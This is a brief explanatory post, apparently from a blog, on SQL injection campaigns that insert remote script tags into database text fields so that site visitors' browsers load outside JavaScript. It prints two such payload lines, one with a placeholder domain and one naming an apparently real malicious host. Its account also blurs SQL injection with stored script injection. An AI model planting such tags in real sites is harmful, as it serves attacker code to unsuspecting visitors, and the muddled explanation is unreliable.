What is SQL Injection Attack

SQL Injection Attack will corrupt your SQL Server Database by injecting some script in text data type fields. Usually these scripts will look something like this

<script src="http://somedomain.com/abc.js"></script>

It is hard to know if your DB is injected as in SQL Injection attacks mostly the site behaves normally but when someone opens your website some background activity is performed from their pc. The way this works is when someone tries to open a page that brings some Data from the DB it also pulls this script tag and the browser will try to run this script as if this is part of the page.

This script poses more danger to the site visiter as the actual script will run on their computer. The website host server which is infected will not misbehave as the script will never run there.

On google if you search for "<script src="http://www.usabnr.com/ngg.js></script>" you will get an idea of how many sites are infected by this attack and most side administrators will not be aware of this. So keep checking your DB specially text fields.